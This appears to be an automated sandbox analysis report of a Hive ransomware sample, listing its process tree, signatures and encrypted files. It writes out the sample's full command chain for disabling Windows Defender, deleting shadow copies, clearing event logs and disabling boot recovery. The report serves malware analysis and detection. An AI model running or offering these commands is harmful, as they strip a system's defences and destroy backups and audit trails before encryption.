PID 1624 wrote to memory of 872 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1624 wrote to memory of 872 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1688 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 2008 wrote to memory of 612 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2008 wrote to memory of 612 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2008 wrote to memory of 612 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1688 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 2016 wrote to memory of 1972 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2016 wrote to memory of 1972 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2016 wrote to memory of 1972 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1688 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1964 wrote to memory of 1260 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1964 wrote to memory of 1260 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1964 wrote to memory of 1260 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1688 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 2020 wrote to memory of 1712 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2020 wrote to memory of 1712 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2020 wrote to memory of 1712 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1688 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe

"C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 5320851668c91e6c29a32dd7e6eaff3d
SHA1 b4aeed87a44ab583c09e2f8ddc526061be64a915
SHA256 84012d4d2718c4739d9d8e44b6c7e4d1bfd77cba733270399487a24b6908e54f
SHA512 18a91a75f685b4299ad75a10d534cca20ae096a1dcdc005afa50d238671cec95dea3fc610589e24dba7a7e91bd848ba6830f855caf7208418faadf2626651fab

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-13 13:15

Reported

2022-01-13 13:20

Platform

win10-en-20211208

Max time kernel

289s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\UseWait.crw => C:\Users\Admin\Pictures\UseWait.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_UtXleI817LA0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File renamed C:\Users\Admin\Pictures\BackupSuspend.png => C:\Users\Admin\Pictures\BackupSuspend.png.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_BK38JAIPPYY0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File renamed C:\Users\Admin\Pictures\CheckpointComplete.crw => C:\Users\Admin\Pictures\CheckpointComplete.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_PIyDs6Kn1yQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Users\Admin\Pictures\OptimizeProtect.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_nGFNE4P9yY00.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Users\Admin\Pictures\CheckpointComplete.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_PIyDs6Kn1yQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File renamed C:\Users\Admin\Pictures\OptimizeProtect.crw => C:\Users\Admin\Pictures\OptimizeProtect.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_nGFNE4P9yY00.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Users\Admin\Pictures\UseWait.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_UtXleI817LA0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File renamed C:\Users\Admin\Pictures\AddRename.tif => C:\Users\Admin\Pictures\AddRename.tif.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_mT6kfWRqNVs0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Users\Admin\Pictures\AddRename.tif.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_mT6kfWRqNVs0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Users\Admin\Pictures\BackupSuspend.png.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_BK38JAIPPYY0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\REFSAN.TTF.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_Y1GsQV_cY6E0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\MusicStoreLogo.scale-200.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\191.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tournament\SampleCompetitor1.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsLargeTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\de-DE.PhoneNumber.model C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusMSDNR_Retail-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_MgKNg1AaXwo0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTrial-ppd.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_QgIUCkSihqU0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailMediumTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\it-it\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_K_rMK21o79s0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_oiENgAPckLA0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x86__8wekyb3d8bbwe\AppxSignature.p7x C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\LAYERS.INF.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_5fCUf-ud1rw0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\Fonts\PplMDL2.1.69.ttf C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ppd.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_WJSZIzruWLc0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\Stripes\NewCollection.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\Ratings\Yelp9.scale-200.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_tAIMHVI0aH80.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\152.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\shake.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailMediumTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.scale-125.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\selector.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_yoQWcHNCJ3c0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosSmallTile.contrast-white_scale-200.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-40.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordVL_MAK-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_A_QgvbPrkFM0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.scale-200_contrast-black.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\MapsWideTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
